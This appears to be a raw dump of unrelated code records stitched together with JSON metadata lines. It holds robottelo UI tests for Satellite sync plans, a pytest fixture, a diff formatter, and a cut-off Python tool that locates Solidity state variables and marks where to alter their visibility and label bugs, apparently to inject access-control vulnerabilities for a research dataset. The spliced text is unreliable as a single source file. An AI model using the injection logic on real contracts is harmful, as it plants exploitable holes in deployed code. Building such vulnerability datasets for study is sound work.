@tier1\n def test_negative_create_with_invalid_name(self):\n \"\"\"Create Sync Plan with invalid names\n\n :id: 
64724669-0289-4e8a-a44d-eb47e094ef18\n\n :expectedresults: Sync Plan is not created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for name in invalid_values_list(interface='ui'):\n with self.subTest(name):\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description='invalid name',\n )\n self.assertIsNotNone(self.syncplan.wait_until_element(\n common_locators['common_invalid']))\n\n @tier1\n def test_negative_create_with_same_name(self):\n \"\"\"Create Sync Plan with an existing name\n\n :id: 6d042f9b-82f2-4795-aa48-4603c1698aaa\n\n :expectedresults: Sync Plan cannot be created with existing name\n\n :CaseImportance: Critical\n \"\"\"\n name = gen_string('alphanumeric')\n with Session(self) as session:\n make_syncplan(session, org=self.organization.name, name=name)\n self.assertIsNotNone(self.syncplan.search(name))\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description='with same name',\n )\n self.assertIsNotNone(self.syncplan.wait_until_element(\n common_locators['common_invalid']))\n\n @tier1\n @upgrade\n def test_positive_search_scoped(self):\n \"\"\"Test scoped search for different sync plan parameters\n\n :id: 3a48513e-205d-47a3-978e-79b764cc74d9\n\n :customerscenario: true\n\n :expectedresults: Proper Sync Plan is found\n\n :BZ: 1259374\n\n :CaseImportance: High\n \"\"\"\n name = gen_string('alpha')\n start_date = datetime.utcnow() + timedelta(days=10)\n entities.SyncPlan(\n name=name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n enabled=True,\n sync_date=start_date,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n for query_type, query_value in [\n ('interval', SYNC_INTERVAL['day']),\n ('enabled', 'true'),\n ]:\n self.assertIsNotNone(\n self.syncplan.search(\n name,\n _raw_query='{} = {}'.format(query_type, query_value)\n )\n )\n\n @skip_if_bug_open('bugzilla', 1460146)\n @tier1\n def test_positive_update_name(self):\n \"\"\"Update Sync plan's name\n\n :id: 6b22468f-6abc-4a63-b283-28c7816a5e86\n\n :expectedresults: Sync Plan's name is updated\n\n :BZ: 1460146\n\n :CaseImportance: Critical\n \"\"\"\n plan_name = gen_string('alpha')\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n for new_plan_name in generate_strings_list():\n with self.subTest(new_plan_name):\n self.syncplan.update(plan_name, new_name=new_plan_name)\n self.assertIsNotNone(self.syncplan.search(new_plan_name))\n plan_name = new_plan_name # for next iteration\n\n @skip_if_bug_open('bugzilla', 1460146)\n @tier1\n @upgrade\n def test_positive_update_interval(self):\n \"\"\"Update Sync plan's interval\n\n :id: 35820efd-099e-45dd-8298-77d5f35c26db\n\n :expectedresults: Sync Plan's interval is updated and no error raised\n\n :BZ: 1460146, 1387543\n\n :CaseImportance: Critical\n \"\"\"\n name = gen_string('alpha')\n start_date = datetime.utcnow() + timedelta(days=1)\n entities.SyncPlan(\n name=name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n enabled=True,\n sync_date=start_date,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n for new_interval in valid_sync_intervals():\n with self.subTest(new_interval):\n self.syncplan.update(name, new_sync_interval=new_interval)\n self.assertIsNone(self.user.wait_until_element(\n 
common_locators['haserror'], timeout=3))\n self.syncplan.click(self.syncplan.search(name))\n # Assert updated sync interval\n interval_text = self.syncplan.wait_until_element(\n locators['sp.fetch_interval']).text\n self.assertEqual(interval_text, new_interval)\n # Assert that start date was not changed after interval\n # changed\n startdate_text = self.syncplan.wait_until_element(\n locators['sp.fetch_startdate']).text\n self.assertNotEqual(startdate_text, 'Invalid Date')\n self.assertIn(\n start_date.strftime(\"%Y/%m/%d\"), startdate_text)\n\n @tier2\n def test_positive_update_product(self):\n \"\"\"Update Sync plan and associate products\n\n :id: 19bdb36a-ed2a-4bbb-9d8d-9ad9f6a800a2\n\n :expectedresults: Sync Plan has the associated product\n\n :CaseLevel: Integration\n \"\"\"\n strategy, value = locators['sp.prd_select']\n product = entities.Product(organization=self.organization).create()\n plan_name = gen_string('alpha')\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['week'],\n organization=self.organization,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n self.syncplan.update(\n plan_name, add_products=[product.name])\n self.syncplan.click(self.syncplan.search(plan_name))\n # Assert product is associated with sync plan\n self.syncplan.click(tab_locators['sp.tab_products'])\n element = self.syncplan.wait_until_element(\n (strategy, value % product.name))\n self.assertIsNotNone(element)\n\n @tier2\n @upgrade\n def test_positive_update_and_disassociate_product(self):\n \"\"\"Update Sync plan and disassociate products\n\n :id: 860bd88e-a425-4218-b02c-64402ee8af9d\n\n :expectedresults: Sync Plan does not have the associated product\n\n :CaseLevel: Integration\n \"\"\"\n plan_name = gen_string('utf8')\n strategy, value = locators['sp.prd_select']\n product = entities.Product(organization=self.organization).create()\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['week'],\n organization=self.organization,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n self.syncplan.update(plan_name, add_products=[product.name])\n self.syncplan.click(self.syncplan.search(plan_name))\n self.syncplan.click(tab_locators['sp.tab_products'])\n element = self.syncplan.wait_until_element(\n (strategy, value % product.name))\n self.assertIsNotNone(element)\n # Disassociate the product from sync plan and the selected product\n # should automatically move from 'List/Remove` tab to 'Add' tab\n self.syncplan.update(plan_name, rm_products=[product.name])\n self.syncplan.click(self.syncplan.search(plan_name))\n self.syncplan.click(tab_locators['sp.tab_products'])\n self.syncplan.click(tab_locators['sp.add_prd'])\n element = self.syncplan.wait_until_element(\n (strategy, value % product.name))\n self.assertIsNotNone(element)\n\n @tier1\n @upgrade\n def test_positive_delete(self):\n \"\"\"Delete an existing Sync plan\n\n :id: 81beec05-e38c-48bc-8f01-10cb1e10a3f6\n\n :expectedresults: Sync Plan is deleted successfully\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for plan_name in generate_strings_list():\n with self.subTest(plan_name):\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n ).create()\n session.nav.go_to_select_org(self.organization.name)\n self.syncplan.delete(plan_name)\n\n @run_only_on('sat')\n @stubbed()\n @tier2\n def test_positive_create_ostree_sync_plan(self):\n \"\"\"Create a 
sync plan for ostree contents.\n\n :id: bf01f23f-ba55-4c88-baad-85603fce57a4\n\n :expectedresults: sync plan should be created successfully\n\n :caseautomation: notautomated\n\n :CaseLevel: Integration\n \"\"\"\n\n @tier4\n def test_negative_synchronize_custom_product_past_sync_date(self):\n \"\"\"Verify product won't get synced immediately after adding association\n with a sync plan which has already been started\n\n :id: b56fccb9-8f84-4676-a777-b3c6458c909e\n\n :expectedresults: Repository was not synchronized\n\n :BZ: 1279539\n\n :CaseLevel: System\n \"\"\"\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = self.get_client_datetime(session.browser)\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n self.syncplan.update(\n plan_name, add_products=[product.name])\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n\n @tier4\n def test_positive_synchronize_custom_product_past_sync_date(self):\n \"\"\"Create a sync plan with past datetime as a sync date, add a\n custom product and verify the product gets synchronized on the next\n sync occurrence\n\n :id: d65e91c4-a0b6-4588-a3ff-fe9cd3762556\n\n :expectedresults: Product is synchronized successfully.\n\n :BZ: 1279539\n\n :CaseLevel: System\n \"\"\"\n interval = 60 * 60 # 'hourly' sync interval in seconds\n delay = 5 * 60\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(seconds=(interval - delay)))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n sync_interval='hourly',\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[product.name])\n # Verify product has not been synced yet\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, product.name))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the next recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @tier4\n def test_positive_synchronize_custom_product_future_sync_date(self):\n \"\"\"Create a sync plan with sync date in a future and sync one custom\n product with it automatically.\n\n :id: fdd3b2a2-8d8e-4a18-b6a5-363e8dd5f998\n\n :expectedresults: Product is synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60 # delay for sync date in seconds\n plan_name = 
gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Verify product is not synced and doesn't have any content\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Associate sync plan with product\n self.syncplan.update(plan_name, add_products=[product.name])\n # Wait half of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/2, product.name))\n sleep(delay / 4)\n # Verify product has not been synced yet\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait the rest of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay/2, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @tier4\n def test_positive_synchronize_custom_products_future_sync_date(self):\n \"\"\"Create a sync plan with sync date in a future and sync multiple\n custom products with multiple repos automatically.\n\n :id: 9564e726-59c6-4d24-bb3d-f0ab3c4b26a5\n\n :expectedresults: Products are synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60 # delay for sync date in seconds\n plan_name = gen_string('alpha')\n products = [\n entities.Product(organization=self.organization).create()\n for _ in range(3)\n ]\n repos = [\n entities.Repository(product=product).create()\n for product in products\n for _ in range(2)\n ]\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Verify products have not been synced yet\n for repo in repos:\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n # Associate sync plan with products\n self.syncplan.update(\n plan_name, add_products=[product.name for product in products])\n # Wait third part of expected time, because it will take a while to\n # verify each product and repository\n self.logger.info('Waiting {0} seconds to check products'\n ' were not synced'.format(delay/3))\n sleep(delay / 4)\n # Verify products has not been synced yet\n for repo in repos:\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n # Wait the rest of expected time\n self.logger.info('Waiting {0} seconds to check products'\n ' were synced'.format(delay*2/3))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n for repo in repos:\n 
self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @run_in_one_thread\n @tier4\n def test_positive_synchronize_rh_product_past_sync_date(self):\n \"\"\"Create a sync plan with past datetime as a sync date, add a\n RH product and verify the product gets synchronized on the next sync\n occurrence\n\n :id: 73a456fb-ad17-4921-b57c-27fc8e432a83\n\n :expectedresults: Product is synchronized successfully.\n\n :BZ: 1279539\n\n :CaseLevel: System\n \"\"\"\n interval = 60 * 60 # 'hourly' sync interval in seconds\n delay = 5 * 60\n plan_name = gen_string('alpha')\n org = entities.Organization().create()\n with manifests.clone() as manifest:\n entities.Subscription().upload(\n data={'organization_id': org.id},\n files={'content': manifest.content},\n )\n repo_id = enable_rhrepo_and_fetchid(\n basearch='x86_64',\n org_id=org.id,\n product=PRDS['rhel'],\n repo=REPOS['rhst7']['name'],\n reposet=REPOSET['rhst7'],\n releasever=None,\n )\n repo = entities.Repository(id=repo_id).read()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(seconds=(interval - delay)))\n make_syncplan(\n session,\n org=org.name,\n name=plan_name,\n description='sync plan create with start time',\n interval=u'hourly',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[PRDS['rhel']])\n # Verify product has not been synced yet\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, PRDS['rhel']))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the first recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, PRDS['rhel']))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @run_in_one_thread\n @tier4\n @upgrade\n def test_positive_synchronize_rh_product_future_sync_date(self):\n \"\"\"Create a sync plan with sync date in a future and sync one RH\n product with it automatically.\n\n :id: 193d0159-d4a7-4f50-b037-7289f4576ade\n\n :expectedresults: Product is synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60 # delay for sync date in seconds\n plan_name = gen_string('alpha')\n org = entities.Organization().create()\n with manifests.clone() as manifest:\n entities.Subscription().upload(\n data={'organization_id': org.id},\n files={'content': manifest.content},\n )\n repo_id = enable_rhrepo_and_fetchid(\n basearch='x86_64',\n org_id=org.id,\n product=PRDS['rhel'],\n repo=REPOS['rhst7']['name'],\n reposet=REPOSET['rhst7'],\n releasever=None,\n )\n repo = entities.Repository(id=repo_id).read()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=org.name,\n name=plan_name,\n description='sync plan create with start time',\n interval=u'hourly',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Associate sync plan with product\n 
self.syncplan.update(\n plan_name, add_products=[PRDS['rhel']])\n # Wait half of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/2, PRDS['rhel']))\n sleep(delay / 4)\n # Verify product has not been synced yet\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait the rest of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay/2, PRDS['rhel']))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @tier3\n def test_positive_synchronize_custom_product_daily_recurrence(self):\n \"\"\"Create a daily sync plan with past datetime as a sync date,\n add a custom product and verify the product gets synchronized\n on the next sync occurrence\n\n :id: c29b99d5-b032-4e70-bb6d-c86f807e6adb\n\n :expectedresults: Product is synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(days=1) + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n sync_interval='daily',\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[product.name])\n # Verify product has not been synced yet\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, product.name))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the next recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @skip_if_bug_open('bugzilla', '1396647')\n @skip_if_bug_open('bugzilla', '1460146')\n @tier3\n def test_positive_synchronize_custom_product_weekly_recurrence(self):\n \"\"\"Create a daily sync plan with past datetime as a sync date,\n add a custom product and verify the product gets synchronized\n on the next sync occurrence\n\n :id: eb92b785-384a-4d0d-b8c2-6c900ed8b87e\n\n :expectedresults: Product is synchronized successfully.\n\n :BZ: 1396647, 1498793\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(weeks=1) + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n 
name=plan_name,\n description='sync plan create with start time',\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n sync_interval='weekly',\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[product.name])\n # Verify product has not been synced yet\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, product.name))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the next recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n","repo_name":"sghai/robottelo","sub_path":"tests/foreman/ui/test_syncplan.py","file_name":"test_syncplan.py","file_ext":"py","file_size_in_byte":36495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"73885925494","text":"from pytest import fixture\nfrom util import Env\n\n\n@fixture(scope=\"module\",\n params=('1.6', '1.7', '1.8'),\n ids=('target=1.6', 'target=1.7', 'target=1.8'))\ndef all_java_targets(request):\n Env['target'] = request.param\n return request.param\n","repo_name":"avekceeb/jvm-test-demo","sub_path":"fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31949173526","text":"import os.path\nfrom typing import Any, Union\n\n\ndef get_value(items: dict, key: str):\n value = items[key]\n\n if type(value) is bool:\n if value is True:\n return 'true'\n return 'false'\n\n elif value is None:\n return 'null'\n\n return value\n\n\ndef get_normalize_value(value):\n if isinstance(value, dict):\n return '[complex value]'\n\n elif value in ('true', 'false', 'null', 0):\n return value\n\n return f\"'{value}'\"\n\n\ndef make_message(ancestry, type, value: Union[Any, list]):\n ancestry = \".\".join(ancestry.split(\"/\"))\n common_part = f\"Property '{ancestry}' was\"\n\n if type == 'changed':\n value1, value2 = value\n value1 = get_normalize_value(value1)\n value2 = get_normalize_value(value2)\n message = f'{common_part} updated. 
From {value1} to {value2}'\n return message\n\n value = get_normalize_value(value)\n\n if type == 'added':\n message = f'{common_part} added with value: {value}'\n return message\n\n elif type == 'deleted':\n message = f'{common_part} removed'\n return message\n\n\ndef plain(tree: list):\n diff = tree['children']\n formatted_diff = []\n\n def walk(diff, ancestry):\n for internal_view in diff:\n\n type = get_value(internal_view, 'type')\n key = get_value(internal_view, 'key')\n cur_ancestry = os.path.join(ancestry, key)\n\n if type == 'nested':\n children = get_value(internal_view, 'children')\n walk(children, cur_ancestry)\n\n elif type == 'changed':\n values = [\n get_value(internal_view, 'value1'),\n get_value(internal_view, 'value2')\n ]\n\n formatted_diff.append(\n make_message(cur_ancestry, type, values)\n )\n\n elif type in ('added', 'deleted'):\n value = get_value(internal_view, 'value')\n formatted_diff.append(\n make_message(cur_ancestry, type, value)\n )\n\n walk(diff, '')\n\n result = '\\n'.join(formatted_diff)\n\n return result\n","repo_name":"Utrian/generate_the_diff","sub_path":"gendiff/formatters/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"46820018074","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nimport json\nimport os\nfrom colorPrint import *\t# this module defines the colored output helpers\nimport re\nimport subprocess\nimport copy\n\n# cache path\nCACHE_PATH = \"./cache/\"\n# path where the information needed for injection is stored\nINJECT_INFO_PATH = \"./injectInfo/\"\n# key for the source positions in the injection info\nSRC_KEY = \"srcPos\"\n# external visibility flag\nEXTERNAL_FLAG = \"external\"\n# public visibility flag\nPUBLIC_FLAG = \"public\"\n# variable declaration flag (perform replacement)\nREPLACE_VISIBILITY_FLAG = \"replaceVisibility\"\n# bug record flag (perform later labeling)\nLABEL_BUG_FLAG = \"labelBug\"\n# constructor flag\nCONSTRUCTOR_FLAG = \"constructor\"\n\nclass judgeAst:\n\tdef __init__(self, _json, _sourceCode, _filename):\n\t\tself.cacheContractPath = \"./cache/temp.sol\"\n\t\tself.cacheFolder = \"./cache/\"\n\t\tself.json = _json\n\t\tself.filename = _filename\n\t\tself.sourceCode = _sourceCode\n\n\tdef run(self):\n\t\tinjectInfo = dict()\n\t\tinjectInfo[SRC_KEY] = list()\n\t\t#1. capture all external and public functions\n\t\ttargetFuncAstList = list()\n\t\tfor func in self.findASTNode(self.json, \"name\", \"FunctionDefinition\"):\n\t\t\tif (func[\"attributes\"][\"visibility\"] == EXTERNAL_FLAG or func[\"attributes\"][\"visibility\"] == PUBLIC_FLAG) and func[\"attributes\"][\"implemented\"] == True:\n\t\t\t\t# found a function with external or public visibility\n\t\t\t\t# step into the function and find statements that touch state variables\n\t\t\t\t# the function must not be a constructor\n\t\t\t\tif func[\"attributes\"][\"kind\"] != CONSTRUCTOR_FLAG:\n\t\t\t\t\ttargetFuncAstList.append(func)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcontinue\n\t\t#2. 
collect the id and declaration position of every state variable\n\t\tstateVarList = list()\n\t\tfor var in self.findASTNode(self.json, \"name\", \"VariableDeclaration\"):\n\t\t\tif var[\"attributes\"][\"stateVariable\"] == True:\n\t\t\t\tstartPos, endPos = self.srcToPos(var[\"src\"])\n\t\t\t\tstateVarList.append([var[\"id\"], startPos, endPos])\n\t\t\telse:\n\t\t\t\tcontinue\n\t\t#[bug fix] inspect every state variable; if its type is ever external, the variable should be excluded\n\t\texternalPattern = re.compile(r\"(\\b)(external)(\\b)\")\n\t\ttemp = copy.deepcopy(stateVarList)\n\t\tfor item in temp:\n\t\t\t# first collect every access to the variable\n\t\t\taccessVarList = self.findASTNode(self.json, \"referencedDeclaration\", item[0])\n\t\t\t# then check the type of each access for an external flag\n\t\t\tfor accessVar in accessVarList:\n\t\t\t\tvarType = accessVar[\"type\"]\n\t\t\t\tif externalPattern.search(varType):\n\t\t\t\t\t# found one, drop this target\n\t\t\t\t\tstateVarList.remove(item)\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t#3. then step into each function and look for accesses to state variables \n\t\tfor func in targetFuncAstList:\n\t\t\tfor var in stateVarList:\n\t\t\t\taccessVarList = self.findASTNodeAttr(func, \"referencedDeclaration\", var[0])\n\t\t\t\tif not accessVarList:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\t#print(var[0] == 2963)\n\t\t\t\t\t# found accesses; record the expression positions statement by statement \n\t\t\t\t\t# first record the position of the variable declaration\n\t\t\t\t\tinjectInfo[SRC_KEY].append([var[1], var[2], REPLACE_VISIBILITY_FLAG])\n\t\t\t\t\t# then go to each access position, find the trailing newline and label the bug\n\t\t\t\t\tfor var in accessVarList:\n\t\t\t\t\t\t_, varEpos = self.srcToPos(var[\"src\"])\n\t\t\t\t\t\t# scan forward from the access position to the newline\n\t\t\t\t\t\twhile self.sourceCode[varEpos] != \"\\n\":\n\t\t\t\t\t\t\tvarEpos += 1\n\t\t\t\t\t\t# record it\n\t\t\t\t\t\tinjectInfo[SRC_KEY].append([varEpos, varEpos, LABEL_BUG_FLAG])\n\t\t#4. deduplicate; compound elements cannot go into a set\n\t\ttemp = copy.deepcopy(injectInfo[SRC_KEY])\n\t\tinjectInfo[SRC_KEY].clear()\n\t\tfor item in temp:\n\t\t\tif item not in injectInfo[SRC_KEY]:\n\t\t\t\tinjectInfo[SRC_KEY].append(item)\n\t\t\telse:\n\t\t\t\tcontinue\n\t\t#5. 
save the result\n\t\tif injectInfo[SRC_KEY]:\n\t\t\tself.storeInjectInfo(injectInfo)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\tdef cleanComment(self, _code):\n\t\t# use regular expressions to capture single-line and multi-line comments\n\t\tsingleLinePattern = re.compile(r\"(//)(.)+\")\t# compile ahead of time for speed\n\t\tmultipleLinePattern = re.compile(r\"(/\\*)(.)+?(\\*/)\")\n\t\t# record the comment indices\n\t\tindexList = list()\n\t\tfor item in singleLinePattern.finditer(_code):\n\t\t\tindexList.append(item.span())\n\t\tfor item in multipleLinePattern.finditer(_code, re.S):\n\t\t\t# multi-line comments need multi-line matching\n\t\t\tindexList.append(item.span())\n\t\t# stitch together the new result\n\t\tstartIndedx = 0\n\t\tnewCode = str()\n\t\tfor item in indexList:\n\t\t\tnewCode += _code[startIndedx: item[0]]\t# item[0] itself is excluded\n\t\t\tstartIndedx = item[1] + 1 # add one so the tail of the previous segment is not overwritten\n\t\tnewCode += _code[startIndedx:]\n\t\treturn newCode\n\n\n\tdef storeInjectInfo(self, _injectInfo):\n\t\ttry:\n\t\t\t# save the information\n\t\t\twith open(os.path.join(INJECT_INFO_PATH, self.filename.split(\".\")[0] + \".json\"), \"w\", encoding = \"utf-8\") as f:\n\t\t\t\tjson.dump(_injectInfo, f, indent = 1)\n\t\t\t#print(\"%s %s %s\" % (info, self.filename + \" target injected information...saved\", end))\n\t\texcept:\n\t\t\t#print(\"%s %s %s\" % (bad, self.filename + \" target injected information...failed\", end))\n\t\t\tpass\n\n\tdef findASTNode(self, _ast, _name, _value):\n\t\tif type(_ast) != list:\n\t\t\tqueue = [_ast]\n\t\telse:\n\t\t\tqueue = list(_ast)\n\t\tresult = list()\n\t\tliteralList = list()\n\t\twhile len(queue) > 0:\n\t\t\tdata = queue.pop()\n\t\t\tfor key in data:\n\t\t\t\tif key == _name and data[key] == _value:\n\t\t\t\t\tresult.append(data)\n\t\t\t\telif type(data[key]) == dict:\n\t\t\t\t\tqueue.append(data[key])\n\t\t\t\telif type(data[key]) == list:\n\t\t\t\t\tfor item in data[key]:\n\t\t\t\t\t\tif type(item) == dict:\n\t\t\t\t\t\t\tqueue.append(item)\n\t\treturn result\n\n\tdef findASTNodeAttr(self, _ast, _attr, _value):\n\t\texternalPattern = re.compile(r\"(\\b)(external)(\\b)\")\n\t\tif type(_ast) != list:\n\t\t\tqueue = [_ast]\n\t\telse:\n\t\t\tqueue = list(_ast)\n\t\tresult = list()\n\t\tliteralList = list()\n\t\twhile len(queue) > 0:\n\t\t\tdata = queue.pop()\n\t\t\tfor key in data:\n\t\t\t\ttry:\n\t\t\t\t\tif key == \"attributes\" and data[key][_attr] == _value:\n\t\t\t\t\t\t# get its type\n\t\t\t\t\t\tvarType = data[key][\"type\"]\n\t\t\t\t\t\t# its type must not contain the external attribute\n\t\t\t\t\t\tif not externalPattern.search(varType):\n\t\t\t\t\t\t\tresult.append(data)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\telif type(data[key]) == dict:\n\t\t\t\t\t\tqueue.append(data[key])\n\t\t\t\t\telif type(data[key]) == 